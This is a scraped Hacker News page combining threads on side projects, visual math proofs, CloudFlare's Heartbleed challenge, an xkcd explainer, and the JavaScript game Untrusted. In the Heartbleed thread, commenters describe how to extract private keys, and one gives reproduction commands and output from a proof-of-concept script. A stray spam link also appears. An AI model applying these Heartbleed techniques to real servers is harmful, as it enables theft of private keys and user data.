The pitfalls of context switching is mentioned often in this article. I have a "problem" where I'll work heavily on a side project for a few days, before getting bored and wanting to move onto another project. The result is that I have many unfinished side projects.

Is it better to focus on one project until completion, even if you aren't as into it anymore? What do other HNers do regarding multiple on-going side projects?

midas007 2 days ago 0 replies      
I find my daily intelligence is highest in the early morning 6:30 am but productivity peaks at about 9:30 am.

Anything in the afternoon is a steady decline and by evening I should just do something that doesn't involve sitting in front of the glowing box. Trying to push yourself too hard results in overall productivity loss.

kf5jak 3 days ago 0 replies      
I've read multiple articles on people doing this. Practice is the best way to learn. Admittedly, I've tried and failed on this before. I love seeing people succeed and become better at their practice using this method. It can only serve as inspiration for others. Thanks and congrats!
ElHacker 3 days ago 0 replies      
I really like this approach. I'll do my best to write meaningful code every day to my side projects.
az0xff 3 days ago 0 replies      
Does working toward your side projects without necessarily writing code count? There are some days where I devote myself to figuring out something on my system that's essential for my side project, and those days I don't necessarily write any code.
vayarajesh 2 days ago 1 reply      
I am totally facing the same issue which you faced about working only during weekends. Your idea of working everyday seems nice i will try giving it a go :)

Nice post!

cbp 3 days ago 0 replies      
It's best if you actually just _read_ code everyday and the writing is just the side effect of tinkering with it. Like chess you will save a lot of time by learning from other people's games before you actually do something on your own.
Thiz 3 days ago 2 replies      
Hey John, just quit KA.

Life is too short to waste it in things you don't love. Remember jQuery brought you fame, not because you were chasing fame itself but because your love for jQuery and programming.

Love for what you do comes first, money is just a secondary effect.

lukasm 3 days ago 0 replies      
This is exactly my approach on my side project, but rather than "write code every day" I say "make some progress every day". Simply because it's not a Open Source framework, but a wannabe product.
cnaut 2 days ago 0 replies      
Doing this helped me start my startup while working full time and eventually feel confident enough to quit my job and work full time on my startup
osetinsky 3 days ago 0 replies      
How long do you spend every day on your side coding? Do you try to set a minimum/maximum amount of time?
drderidder 3 days ago 0 replies      
That post was awesome... slow and steady wins the race. Inspiring!
ribs 3 days ago 0 replies      
"I realized that the feeling of making progress is just as important as making actual progress."


shanwang 2 days ago 0 replies      
thank you, this is the best advice about side projects i have ever read, I'm going to practice this from today!
finalight 2 days ago 0 replies      
there's a saying; practise makes perfect

it applies not only to coding, but also to other areas

mildtrepidation 3 days ago 0 replies      

Always be coding.




dstavis 3 days ago 0 replies      
Avishai_Bitton 3 days ago 0 replies      
If you don't use it, you lose it...
chris_mahan 3 days ago 0 replies      
The best code is no code.
pipukamal 3 days ago 0 replies      
Highlanders vs Bulls Live Super 15 Game Free Streaming xv rugby Online http://storify.com/superrugbyoz/higvbulnzt
Visually stunning math concepts which are easy to explain stackexchange.com
528 points by aaronbrethorst  7 days ago   78 comments top 29
pyduan 7 days ago 2 replies      
For those who are hungry for more, Lucas Vieira Barbosa (LucasVB) has made a lot of great such illustrations for Wikipedia over the years:


Spittie 7 days ago 1 reply      
I wish my teacher showed me stuff like that in high school instead of just scary numbers. While I do understand that eventually you need to get down to the numbers, my brain seems to pick up the overall concept much faster seeing nice visual representations like those.
greenyoda 7 days ago 1 reply      
I'm surprised that nobody posted the visual proof for the countability of the rational numbers:


cruise02 6 days ago 0 replies      
I love these. I posted several on my blog a few years ago.

Six Visual Proofs: http://www.billthelizard.com/2009/07/six-visual-proofs_25.ht...

Visualization of (X + 1)^2: http://www.billthelizard.com/2009/12/math-visualization-x-1-...

cubancigar11 6 days ago 0 replies      
While the most up-voted Pythagoras theorem proof [1] might be fun to see, it is rather the proof of the spectacular failure of our education - that nobody remembers anything taught in our school. The similarity of right triangles in a circle is proven using Pythagoras theorem in the first place!

Thankfully a better proof is present [2] which depends on distributive property and algebra.

1. http://math.stackexchange.com/a/733765/1411202. http://math.stackexchange.com/a/734887/141120

jloughry 7 days ago 2 replies      
This animated gif of the Fourier transformation from the time domain to the frequency domain (from the original post on stackexchange.com) is just stunning:


Where were these when I was in school?

gabemart 6 days ago 1 reply      
This page just underlines my complete mathematical illiteracy. I don't really understand any of it. I would like to get a basic grounding in math, but it seems like so wide a field I have no idea where to start.
yogrish 7 days ago 1 reply      
Another site that explains Mathematical concepts Intuitively.Trigonometry: http://betterexplained.com/articles/intuitive-trigonometry/ Other Topics: http://betterexplained.com/archives/
sixothree 6 days ago 0 replies      
I've found these videos to be fairly interesting.


NAFV_P 6 days ago 0 replies      
I remember the example that explains how to derive the area of a circle from several years ago, but there is also an analogue for the surface area of a sphere provided you know the volume...

The volume is

the surface can be broken up into lots of spherical triangles. The vertices of each of these triangles is joined to the sphere's centre to form a load of tetrahedrons. As the number of these triangles increases and their size decreases without limit, their total volume will asymptotically approach the volume of the sphere. The volume of a tetrahedron is

  1/3*base*height.  sum(tetrahedron_volume)=volume_of_sphere=4/3*pi*radius^3
The tetrahedrons are flattened to end up as triangular columns with equal height (1/3 of the sphere's radius). The resulting shape should be a column with height 1/3 the radius of the sphere whose cross-sectional area is equal to the sphere's surface area. The height is

  1/3*r ...  (4/3*pi*radius^3)/(1/3*r)=4*pi*radius^2
EDIT: bloomin' asterisks, I should have remembered.

sphericalgames 7 days ago 0 replies      
Animated / interactive Bezier curves: http://www.jasondavies.com/animated-bezier/
mattdeboard 6 days ago 2 replies      
Kind of a meta question but is all the latex markup on that page supposed to be styled or do people just write it out like that out of habit
caio1982 7 days ago 0 replies      
Really neat representations. I've learned a lot of new stuff tonight from the original post, thanks for sharing! My favorite so far: Gibbs Phenomenon.
alok-g 7 days ago 0 replies      
Here is a great book along these lines. Not always visual, but always (and often unexpectedly) simple.


deckar01 6 days ago 0 replies      
I just posted a visualization of multiplication of the integers modulo n http://math.stackexchange.com/questions/733754/visually-stun... to this question.

This visualization makes it easy to notice the factors of n and the symmetry of multiplication.

ryannevius 7 days ago 0 replies      
imodgames 6 days ago 0 replies      
Here's one for the integral of y=x^2:http://www.mathedpage.org/proof/integrating/
shitgoose 7 days ago 0 replies      
Very nice! My personal favorite is "The sum of the exterior angles of any convex polygon will always add up to 360".
suyash 6 days ago 0 replies      
Would love to see a similar post for CS Core Concepts (think OOP, Data Structure & Algorithms etc). Anyone know of such a url? Thanks in advance.
PhasmaFelis 7 days ago 0 replies      
I've often seen hypercubes pictured or described like this: http://en.wikipedia.org/wiki/File:Hypercube.svg

...which doesn't really explain much. Then I saw this animation of a rotating hypercube and suddenly it made so much more sense: http://en.wikipedia.org/wiki/File:Tesseract.gif

The takeaway for me was that, in that static depiction, the inner cube is a cube, and the outer cube is a cube, and each of the six (apparent) truncated pyramids is also a cube, just a visually distorted one. There are eight cubes in the hypercube and each shares a face with six others, just as the six squares in a cube each share an edge with four others. You could have told me all of that and I wouldn't have understood it, but after seeing the animation I was able to work it out for myself.

Totient 6 days ago 0 replies      
The Fourier transform .gif was gorgeous. Anyone know of a similar one for Laplace transforms? (I'm still having trouble building up intuition for the Laplace transform.)
Gravityloss 6 days ago 1 reply      
Anybody up to visualizations about quaternions?
z3t4 6 days ago 0 replies      
The reason why you understand this better then numbers might be because you are more visual orientated.
kimonos 7 days ago 0 replies      
Very interesting and easy-to-understand presentations. Thanks for sharing!
PavlovsCat 6 days ago 0 replies      
Personally, I can always use some music to actually get stunnned :)


devilshaircut 6 days ago 0 replies      
This may have already been posted in another thread, but it doesn't appear to have been posted here. But this is a great visualization for the Pythagorean Theorem.


Fun for kids, also, when they are learning about it.

dfc 6 days ago 0 replies      
The topology answer is a great example of the problem some mathematicians have communicating ideas to lay people.
ilaksh 6 days ago 1 reply      
The last one on the page at the moment. Is this what I think it is? LOL. http://i.imgur.com/8m47tuJ.png
CloudFlare's Heartbleed challenge cracked twitter.com
519 points by jmduke  2 days ago   138 comments top 23
nikcub 2 days ago 4 replies      
Reading Cloudflare's blog post[0], they keep referring to the exploit having a length of 65,536 bytes, and how an allocation of that size is unlikely to find itself lower in the heap.

That is true - but this exploit doesn't depend on setting a length of 65,536. The server takes whatever length the client gives it (which is, afterall, the bug). Most of the early exploits just happen to set the maximum packet size to get as much data out (not realizing the nuances of heap allocation). You can set a length of 8bytes or 16bytes and get allocated in a very different part of the heap.

The metasploit module for this exploit[1] supports varied lengths. Beating this challenge could have been as simple as running it with short lengths repeatably and re-assembling the different parts of the key as you find it.

edit something that I want to sneak in here since I missed the other threads. Cloudflare keep talking about how they had the bug 12 days early. Security companies and vendors have worked together to fix bugs in private for years, but this is the first time i've ever seen a company brag about it or put a marketing spin on it. It isn't good - one simple reason why: other security companies will now have to compete with that, which forces companies not to co-operate on bugs (we had the bug 16 days early, no we had the bug 18 days early!, etc.).

As users you want vendors and security companies co-operating, not competing at that phase.

[0] Cloudflare - Can You Get Private SSL Keys Using Heartbleed? http://blog.cloudflare.com/answering-the-critical-question-c...

[1] see https://github.com/rapid7/metasploit-framework/blob/master/m...

tptacek 2 days ago 4 replies      
d0ne 2 days ago 1 reply      
We have reached out via twitter to this invidiual as to coordinate the delivery of the $10,000 bounty we offered. If anyone is already in contact with them please direct them to https://news.ycombinator.com/item?id=7572530
danielpal 2 days ago 2 replies      
The important thing to know here is that you not only have to change your current certs you ALSO HAVE TO REVOKE THE OLD ONE.

If you only change your current cert to get a new key but you don't go through the revocation process of the old certificate if someone managed to get the old one they can still use it for a MiTM attack - as both certs would be valid to any client.

ig1 1 day ago 1 reply      
So I didn't manage to crack the challenge (I used around 10k heartbeats), but I suspect it may have just been a case of brute-force (i.e asking for enough heartbleeds). Other people may have got the key without realizing that had done so because they were looking for the wrong thing (i.e. normal cert text representation).

I took the approach of using two fingerprints to search the data:

1) The hex sequence "30 82 .. .. 02 01 00" which would indicate the ASN.1 private key encoding which OpenSSL uses.

2) The modulus which I extracted from the public key (which would also be in the private key structure)

I didn't find any instance of the first, the second I found lots of instances of (because the modulus is also in the public key). I then filtered out all the instances of the public key by searching for the public key header ("30 82 .. .. 30 82").

This actually left me with two unique instances of the modulus in memory which weren't in a public key structure. I then tried to overlay the private key structure over the data and extracted what should have been the prime numbers and ran a primality test on them (to verify; another way would have been to just feed the structure into openssl). Both failed, so it wasn't the private key structure.

But there's a reasonable chance that those two instances represented a cryptographic calculation in progress; so while recovering the key wouldn't be as trivial as if you grabbed the full private key structure from memory (which I suspect is what the successful attackers did) I think it definitely represents another attack angle.

benmmurphy 1 day ago 3 replies      
i think cloudfare's version of nginx is a lucky version or my code is bugged or time after restart is important or you need to do some heap-fu by sending different payload sizes.

so i booted up a micro vm on amazon aws and was able to dump the private key in one request.

Ubuntu Server 13.10 (PV) - ami-35dbde5c

  sudo add-apt-repository ppa:nginx/development  sudo apt-get update  sudo apt-get install nginx  sudo apt-get install ssl-cert
modify /etc/nginx/sites-enabled/default uncomment ssl server and change certs:

  ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;  ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;  sudo /etc/init.d/nginx restart  curl -O https://gist.githubusercontent.com/benmmurphy/12999c91a4d328b749e3/raw/9bcd402e3d9beec740a61a1585e24c36dea80859/heartbeat.py  chmod u+x heartbeat.py  ubuntu@ip-10-185-20-243:~$ ./heartbeat.py localhost /etc/ssl/certs/ssl-cert-snakeoil.pem  Using modulus: C30FB990C6C1EE4EE4524A724BDF10DCDC735C9BCCED84B38796584DCE9F7CB1027CCF63A0E604882AE9B8639CD0955C207BE641943AE38AC4DAE63ECCE7E79ACE7EB9EB5D92F55761924C35A00EB5AE4759CB6DC938DBD48ED34685BC32B3193FEF55F081BB2BFC33494F26E556803FD2506F94301DFD688A63F9F3572C540F3F5E7679D5454E532503636ABFCB95AC5674D47C2B23C4418E04BE1D36AECF6BFEA81FC38FCA3E72A3EACD0BFD4E07FDC3BFA8E70E002ECA68FE8E0621F56081D90A3724A1BED6B5E3BDCDCC02B4EDEAFD0EC4D60C7DEC95BF7756CD82442915EE1AB6738F38B3BA932C8D27B34E94205C84AB64ACC34487ED2FF3804332AB63  Using key size: 128  Scanning localhost on port 443  Connecting...  Sending Client Hello...  Waiting for Server Hello...  Got length: 66   ... received message: type = 22, ver = 0302, length = 66  Message Type is 0x02  Got length: 750   ... received message: type = 22, ver = 0302, length = 750  Message Type is 0x0B  Got length: 331   ... received message: type = 22, ver = 0302, length = 331  Message Type is 0x0C  Got length: 4   ... received message: type = 22, ver = 0302, length = 4  Message Type is 0x0E  Server sent server hello done  Server TLS version was 1.2  Sending heartbeat request...  Got length: 16384   ... received message: type = 24, ver = 0302, length = 65551  Received heartbeat response:  Got result: 154948185083822336433702373602285084550034029190596792283600073258494868382158852796844241764405565518400264295279959791461705192749666707538790201985451035410116800023040704455951541838840288378897688943017357577574672157589664822948047455855119173651635078033464041188274590174256703712210173285385390714209  found prime: 0xdca74e63a186d60a9de3c8211e21a5b165c6d86d285c1d6eece2ad7a2505890ebae513e3013c3602f148e2112eaa99edd8ff5922494c4db47156727f93ab0f35a298553a82dfbd91e5e8aff2e969f31db31263bce9a89d95b64ff38ff5b86d47fa2e70aac5198d2ea967eb952f48b7264e824bd03b1c955294fb9caeed02ed61L
you can check the prime by doing:

  ubuntu@ip-10-185-20-243:~$ sudo openssl rsa -in /etc/ssl/private/ssl-cert-snakeoil.key -text  ..  prime1:      00:e2:4e:eb:f7:88:3a:d4:ad:61:2c:ef:6f:b2:a6:      3b:dd:c4:99:89:f1:b4:6e:6b:ce:76:51:c3:23:f7:      7a:37:69:f9:6c:eb:65:3d:cd:6a:f7:c9:97:96:b0:      f6:39:72:8a:ca:f7:45:3c:ff:25:b0:dd:a9:c1:08:      c3:aa:53:41:22:20:df:74:cb:1d:ad:ce:67:1d:11:      00:15:33:65:1f:d4:b9:a8:2b:27:50:da:7c:a7:e1:      88:d1:2c:d8:d9:32:07:ba:23:e1:40:fa:fa:94:46:      7f:9b:35:a1:d2:e4:91:86:f6:f3:79:2f:53:fd:95:      4d:99:56:b3:c0:be:97:6b:43  prime2:      00:dc:a7:4e:63:a1:86:d6:0a:9d:e3:c8:21:1e:21:      a5:b1:65:c6:d8:6d:28:5c:1d:6e:ec:e2:ad:7a:25:      05:89:0e:ba:e5:13:e3:01:3c:36:02:f1:48:e2:11:      2e:aa:99:ed:d8:ff:59:22:49:4c:4d:b4:71:56:72:      7f:93:ab:0f:35:a2:98:55:3a:82:df:bd:91:e5:e8:      af:f2:e9:69:f3:1d:b3:12:63:bc:e9:a8:9d:95:b6:      4f:f3:8f:f5:b8:6d:47:fa:2e:70:aa:c5:19:8d:2e:      a9:67:eb:95:2f:48:b7:26:4e:82:4b:d0:3b:1c:95:      52:94:fb:9c:ae:ed:02:ed:61  ..
so the exploit is the most stupid one possible. i took the POC code and changed it to read all 64k. The version i had was reading only 14kb from the server. Then just check all the 128 byte strings to see if they divide the modulus evenly.

tomkwok 2 days ago 3 replies      
* From https://www.cloudflarechallenge.com/heartbleed *

So far, two people have independently solved the Heartbleed Challenge.

The first was submitted at 4:22:01PST by Fedor Indutny (@indutny). He sent at least 2.5 million requests over the span of the challenge, this was approximately 30% of all the requests we saw. The second was submitted at 5:12:19PST by Illkka Mattila using around 100 thousand requests.

We confirmed that both of these individuals have the private key and that it was obtained through Heartbleed exploits. We rebooted the server at 3:08PST, which may have contributed to the key being available in memory, but we cant be certain.

guelo 2 days ago 2 replies      
"We rebooted the server at 3:08PST, which may have contributed to the key being available in memory, but we cant be certain.". https://www.cloudflarechallenge.com/heartbleed

That doesn't make sense to me, seems like the key needs to be in memory all the time, or at least during every session.

alexkus 1 day ago 0 replies      
Didn't have any spare time to have a go at this, here's how I was going to do it:-

1) Create a VM with the same version of Linux, nginx, openssl.

2) Create a self-signed SSL certificate for the server

3) Verify that the HTTPS server is vulnerable to heartbleed

4) Run a few HTTPS requests against the server

5) Use gcore (or just send SIGABRT) to get a core file of the nginx process

6) Write a tool to check the memory image for remnants of the private key (since I know what it looks like). This may be encoded in several forms: as is from the ssl key file, hex encoded modulus, binary encoded modulus, however the BigNum stuff in OpenSSL stores the modulus, intermediate values used in calculations, etc. I can also check for partial matches since I know what the full key looks like.

7) Run the heartbleed client against the site to extract some chunks of memory, there are various strategies for this:-

a) Repeatedly grab the largest (65535) bytes of memory each time

b) Repeatedly grab different sizes (8KB, 16KB, etc) depending on the bucket sizes for OpenSSL's freelist wrapper around malloc.

c) Vary the request size (lots more headers, etc) to try and get different chunks of memory returned.

d) Occasionally restart nginx

8) Once I can reliably (for whatever value of reliably that is) get the key from my own server, I then modify the test for success from a comparison against the known private key, to a test which involves decrypting a string that was the result of encrypting some known plaintext with the known public key. That'll be slower, but still possible.

9) Run that analysis against real data retreived from the challenge server. The data (using the various strategies in #7) can be obtained in the background whilst I'm developing #1-#8. You can't rely on having sole access to the server so whatever strategy you use may be perturbed by other people performing requests.

10) Repeat #1-#8 for Apache and any other web server that is vulnerable to heartbleed.

This does work on the assumption that the key (in whatever form it is in) will be returned as a contiguous block of memory. Trying to patch together chunks of memory to look for the key will be much much harder unless there's significant overlap and it's easy to detect what/where a key is somehow.

ademarre 2 days ago 4 replies      

Pic of the CloudFlare team reviewing the attack. Ten guys crowded around one monitor.

aboodman 2 days ago 0 replies      
It probably took longer to compose that blog post than it took @indutny to disprove it.
nodesocket 2 days ago 1 reply      
Love to see a post on how it was done and the tools he used.
wrs 2 days ago 0 replies      
Well, so much for wishful thinking.
tszming 2 days ago 1 reply      
So @indutny sent at least 2.5 million requests, should we start to think more on the practical prevention techniques?
badusername 2 days ago 1 reply      
So this does mean that I need to change my passwords on every damn site on the list? Oh bollocks, those passwords were a work of art.
capcah 2 days ago 1 reply      
I am not sure how those guys did it, but I was talking to a friend of mine today, and I guess that it had something to do with forcing the server to use its private key to check for information sent to it. Then you use the heartbleed bug to intercept the intermediate forms on the information you sent to be decrypted/authenticated. Since you know the plaintext, the ciphertext and the intermediate forms, it should be possible to recover the key.

As I said, I am not sure that is right or if that was the method used to exploit cloudflare, as I didn't had the time nor the knowledge of openssl implementation to test it out, I am just throwing my guess out there before the official exploit comes about.

edit: formatting

specto 2 days ago 1 reply      
Considering he just pulled a shadow file as well, it's not pretty.
tectonic 2 days ago 2 replies      
Ah crap.
athoik 1 day ago 0 replies      
An error occurred during a connection to www.cloudflarechallenge.com. Peer's Certificate has been revoked. (Error code: sec_error_revoked_certificate)

Game over...

diakritikal 2 days ago 0 replies      
Hubris is ugly.
dogsky 1 day ago 0 replies      
I was unable to replicate. Can someone give more details, maybe the heartbleed script updated and some instructions to replicate it? Thanks.
yp_maplist 2 days ago 0 replies      
IMO, CloudFlare is lame. Kudos to this guy for reminding me just how much so.
bitsteak 2 days ago 1 reply      
Why did anyone need this challenge in the first place? Couldn't someone have justed ASKED a good exploit developer what they would do and what the impact is? No, I guess we're all up for wasting people's time and creating potential false negatives.
Xkcd: Heartbleed Explanation xkcd.com
518 points by MattBearman  2 days ago   74 comments top 12
billpg 2 days ago 2 replies      
I showed this to my wife to see if the cartoon worked with an educated but not-technical person. She subconsciously glossed over the (n LETTERS) part of Meg's requests as just an annotation on the cartoonist's part, not realizing that it was actually part of the request.

Once I rephrased the final request as "Server, reply with the 500 letters of HAT", we finally had that light-bulb moment.

nyellin 2 days ago 3 replies      
This is why xkcd is unique - not because of the puns or nerdy references, but because of Randall's ability to make complicated issues simple.
StavrosK 2 days ago 2 replies      
Nice easter egg in the user who wants to change the password to CoHoBaSt (correct-horse-battery-staple).
mixedbit 2 days ago 1 reply      
Security issue explained without Alice, Bob and Malory, this is way too confusing. Who is this Meg character?
AndrewDucker 2 days ago 6 replies      
Can someone explain why Heartbeat needed to return the text it was sent, rather than always returning an "OK" message?

What advantage does returning the text give you?

weavie 2 days ago 5 replies      
Wow. Was it really that simple? The heart beat request sends the text as well as the length it wants back?
damon_c 2 days ago 0 replies      
It's hard to believe that even with all of our slavish mantra repetition about not trusting user submitted data... the freaking web server trusts user submitted data.

We're all going to have to start reading more source code...

parax 2 days ago 0 replies      
"And this is, kids, why you always have to validate your input and do not trust on the user".
yiedyie 2 days ago 0 replies      
danyork 2 days ago 0 replies      
Brilliantly done! Great to have this out there to help explain the issue to non-developers.
spbhat1989 2 days ago 0 replies      
Xkcd is best at simplifying the most complex things and complicating the most simple things! :)
nashashmi 2 days ago 1 reply      
I just began appreciating all the hoops I jump through just to concentrate on things hardly anyone else cares about. It takes me nearly ten times as long to complete a program, and taxes my mind ten times more, and makes me frustrated twice as much about pursuing programming, but after a very sharp practicing curve, makes me hundred times better than the rest of the programmers out there. But, still, I wonder if it's worth it. Especially, considering my boring as hell job.
Show HN: Untrusted, a JavaScript adventure game you play by modifying its source nisnevich.com
515 points by alnis  6 days ago   235 comments top 68
alnis 6 days ago 4 replies      
Hey guys, one of the developers here.

Thank you all so much for all of your feedback! I never thought this game would become so popular.

It seems that our server is more or less overloaded right now, so AJAX requests for new levels are sometimes failing. This appears to be the cause of the bugs that some of you have experienced where levels load incorrectly or are overwritten by previous levels. Sorry about that. :-/ We will work on making the game more robust in the case of failures like this.

If you want to run the game locally, you can clone it from https://github.com/AlexNisnevich/untrusted and follow the instructions there.

ajanuary 6 days ago 1 reply      
The level files are 503ing, but it looks like the level counter is still incrementing if I go out of the exit and back in again. You might want to add some response code validation in.

    GET http://alex.nisnevich.com/untrusted/levels/10_ambush.jsx 503 (Service Unavailable) jquery.min.js:6    GET http://alex.nisnevich.com/untrusted/levels/11_robot.jsx 503 (Service Unavailable) jquery.min.js:6    GET http://alex.nisnevich.com/untrusted/levels/12_robotNav.jsx 503 (Service Unavailable) jquery.min.js:6    GET http://alex.nisnevich.com/untrusted/levels/13_robotMaze.jsx 503 (Service Unavailable) jquery.min.js:6    GET http://alex.nisnevich.com/untrusted/levels/14_crispsContest.jsx 503 (Service Unavailable) jquery.min.js:6    GET http://alex.nisnevich.com/untrusted/levels/15_exceptionalCrossing.jsx 503 (Service Unavailable) jquery.min.js:6    GET http://alex.nisnevich.com/untrusted/levels/16_lasers.jsx 503 (Service Unavailable) jquery.min.js:6    GET http://alex.nisnevich.com/untrusted/levels/17_pointers.jsx 503 (Service Unavailable) jquery.min.js:6    GET http://alex.nisnevich.com/untrusted/levels/19_documentObjectMadness.jsx net::ERR_CONNECTION_REFUSED jquery.min.js:6    GET http://alex.nisnevich.com/untrusted/levels/20_bossFight.jsx net::ERR_CONNECTION_REFUSED jquery.min.js:6    GET http://alex.nisnevich.com/untrusted/levels/21_endOfTheLine.jsx net::ERR_CONNECTION_REFUSED

antimagic 5 days ago 2 replies      
Here's an Iron Man inspired solution for the boss battle :)

    map.placeObject(map.getWidth()/2, 5, 'block');    //map.placeObject(map.getWidth()/2, 1, 'block');    var player = map.getPlayer();    map.defineObject('missile', {        'type': 'dynamic',        'symbol': '^',        'color': 'blue',        'interval': 100,        'projectile': true,        'behavior': function (me) {            me.move('up');        }    });        function jericho()    {    var i;    for (i = 3; i < map.getWidth() - 3; i++)        {        map.placeObject(i, map.getHeight() - 1, 'missile');        }    }    player.setPhoneCallback(function()    {    jericho();    });

columbo 6 days ago 2 replies      
That was great,

Here's making the boss kill itself


lawl 6 days ago 3 replies      
This is fun. But I have one wish. Overwrite console.log() so it logs onto the website and I don't need to open firebug :)

Edit: I think I solved lvl two to four all the same way. Not sure if that's intended. But I also don't want to spoil it for others.

Edit 2: This worked again at lvl 6, so I'll assume that's a bug.Click this pastebin for spoilers: http://pastebin.com/yfhDhE7P

christiangenco 6 days ago 3 replies      
I love this game! Such a cool idea, and very well executed.

My biggest critique so far is that it's extremely hard for me to tell the difference between #311 and #000 for the `.disabled` lines (I'm mildly red-green colorblind). Changing it to #711 fixed it for me, but I can imagine it would be impossible to even see #F11 for certain colorblind individuals. Perhaps some other kind of indication that a line is editable, or a more drastic #FFF/#000 distinction?

jpolitz 6 days ago 1 reply      
This worked for the whole first chapter for me (and has some obvious further applications):

    startLevel["constructor"]("m",    "console.log(m);" +    "var old = m.placeObject;\n" +    "m.placeObject = function(x,y,t) { \n" +    "console.log(t);\n" +    "if (t === 'exit' || t === 'computer') {\n" +    "console.log('adding' + t);\n" +    "return old['ca' + 'll'](m, x,y,t) }};")(map);
EDIT: I wonder if you could wrap the user's code in, e.g. https://code.google.com/p/es-lab/wiki/SecureEcmaScript, and use this to gamify finding bugs in that sandbox :-)

th0br0 6 days ago 2 replies      
You should reinit the map though, otherwise doing this on level 2 causes funny bugs (and makes the game rather easy ;)

    maze.create = function() {};    var tmp = map.placeObject;    map.placeObject = function(x, y, t) {    if(t == 'exit') tmp(x,y,t);    };

alnis 6 days ago 1 reply      

The main site is overloaded, but I've set up a mirror at: http://alexnisnevich.github.io/untrusted/

All level-loading issues should be resolved on it, since they were tied to AJAX failures. Let me know if you experience any problems on the mirror site.

bcherry 6 days ago 0 replies      
You had me at "The continuing adventures of Dr. Eval"
tripzilch 3 days ago 0 replies      
I solved the jump/gravity level without having to edit any code, dunno if that's supposed to be possible, but: if you press+hold the UP key, keyboard repeat rate will be fast enough that you "fly", allowing you to cross the gap (and even save yourself if you happen to fall in it).

I also solved the DOM level without editing anything, I just pressed some keys and it transported me to the next level before I even had an idea what was going on.

(im playing on Firefox / Linux, in case that makes a difference)

Oh and thanks for this game, it's EXTREMELY COOL and I had a lot of fun playing it all the way to the credits screen (and I'm going to go back now to see if that's really the last level or not ...)

chacham15 6 days ago 0 replies      
Am I the only one spending more time on figuring out how to cheat than actually doing the level the way you are supposed to?
zenbowman 6 days ago 0 replies      
Pretty cool game bud, I actually think this is a superior environment for learning to program than many of the richer 3-d interfaces I've seen.
pritambaral 6 days ago 1 reply      
Level 6 can be cleared without modifying the code at all:

http://home.iitb.ac.in/~pritambaral/level6.mp4 (16K)

http://home.iitb.ac.in/~pritambaral/level6.webm 31K)

http://home.iitb.ac.in/~pritambaral/level6.gif (161K)

EDIT: Seems to have been fixed. Leaving comment for archival purposes?

cbhl 5 days ago 0 replies      
This must be resulting in a lot of new gists on GitHub... is it odd that I wish I could sign in with my GitHub account so that the level saves showed up as gists under my name?
fijter 5 days ago 1 reply      
Very cool game, thanks :)One minor issue in the API docs:

canvasContext.beginPath()Begins drawing a new shape.canvasContext.beginPath(x, y)Sets the end coordinates of a line.

this second beginPath should be lineTo, took a minute to debug in level 16 :)

aaronem 6 days ago 1 reply      
This is fun! But I've run into a problem. Advancement past level 14 seems to be bugged; upon completion, the keys in my inventory were replaced with a capital A which I assume to represent the algorithm, but then level 14 reloaded with a message at the bottom saying "You have lost the Algorithm!" Re-completing the level works, but the same thing happens, as many times as I like; the last time, I saw "run 17_pointers.jsx" scroll past, but still got the map and code for level 14.

My solution to level 14 [1] involved a state variable on the me object; could that have broken something?

[1] https://gist.github.com/anonymous/8e4f11c26e5e6fe3d7d6

jayferd 6 days ago 2 replies      
Content note: plays sound.

Did the quick ^W at work :|

DocG 6 days ago 0 replies      

I have 0 knowledge about writing all kinds of code. This is perfect to start with. Specially thanks to the API part.

jasonkester 5 days ago 0 replies      
Awesome game.

One thing it drives home for me is just how distracting music is when I'm trying to code. It pulled up that first listing and I literally could not parse it until I muted the audio. Then it immediately turned back into code.

It's like music just turns off the switch that connects the eyeballs to the brain. Amazing.

jblz 6 days ago 2 replies      
Very fun. I found a bug that lets me skip levels 8-11 by using this code in the phone callback on level 7:

  if ( ! ( player.cc && player.cc.length ) ) {       player.cc = ['#f00', '#ff0', '#0f0'];  }  player.setColor(player.cc.shift());
It says it's loading the next level, but the code and gamefield remain stuck on level 7 until you push it to level 12.

muxxa 6 days ago 1 reply      
Using CTRL+Q for the phone is dangerous on a mac, as it's easily confused with APPLE+Q which closes the browser window, losing your progress.


Edit: it saves the game state in localstorage; kudos!

Ellipsis753 6 days ago 1 reply      
Does anyone know of a nice way to unlock levels for the mirror?I'm on the first jQuery one but all I see is black text on a white screen. No players and nothing changes when I use the arrow keys. I can't find anything in the code I can edit either.I'd like to try the mirror but I don't want to have to play though the whole game again?
vjeux 6 days ago 2 replies      

    map.validateExactlyXManyObjects = function() {};
lets you put an exit tile next to your character on every level

marijn 6 days ago 0 replies      
Seems to be overloaded now. Multiple 503s.
arcatek 6 days ago 0 replies      
Very fun, however once I reached the level with the DOM, I catched the opponent but the game went crazy and submitted a lot of queries to Gist (when I closed the tab, the counter was at 64, and Github was serving 403).
shangxiao 6 days ago 1 reply      
I wasn't sure how to show all the mines on the minesweeper map, so I just place them all at the top... was this supposed to be the point? :)

Anyhoo, nice game, it doesn't matter how you solve it, as it still proves that eval is evil ;)

mandlar 6 days ago 4 replies      
I'm not sure what happened with level 4 multiplicity, but I placed a 2nd exit inside the box. Then when I go through it says it completed the level but I'm still on the multiplicity level. Reseting does not fix. https://gist.github.com/anonymous/0dafb64fad2ddd6fd451
nanidin 6 days ago 1 reply      
> "If you can read this, you are cheating! D:"

Loaded the site, popped open the Chrome Dev Tools, and was thoroughly disappointed.

throwawayLSKDNF 5 days ago 1 reply      
Level 5 should have more mines.

With only 75, the level is easily solved via https://en.wikipedia.org/wiki/Big_sky_theory

Dou8Le 6 days ago 1 reply      
Chrome seems to crash every four or five levels and it forces me to reload the page. It's a tad annoying going back through my levels.

Perhaps consider a level select, since it's able to remember your solutions?

resist_futility 6 days ago 8 replies      
Anybody think of another way to do the robot levels without adding any state?


Aardwolf 6 days ago 1 reply      
I'm not sure what the real intention of the level "Multiplicity" was, but just placing an exit anywhere you want works just as well!
pritambaral 6 days ago 2 replies      
Borks at level 7, upon touching phone with undebuggable message on canvas:

  d up the function p 1, found:oad the level  Wone! number of exits ...

anigbrowl 6 days ago 1 reply      
Loved it, but exiting on Level 1 just causes level 1 to reload for me and never unlocks level 2.
Bartweiss 5 days ago 0 replies      
On level 15, my deaths keep changing the editable window. I'll die and then the last several characters (4 I believe) of my code get swapped to uneditable until I reset.

I'm also encountering a bunch of exceptions during game execution instead of at build, which are making things rather hard to beat. I'd list them but they vanish faster than I can read them.

jimmaswell 6 days ago 0 replies      
I forgot about comments on lvl 2 and used if(0){} and was wondering what the 4 was until I remembered //, hah
lectrick 6 days ago 1 reply      
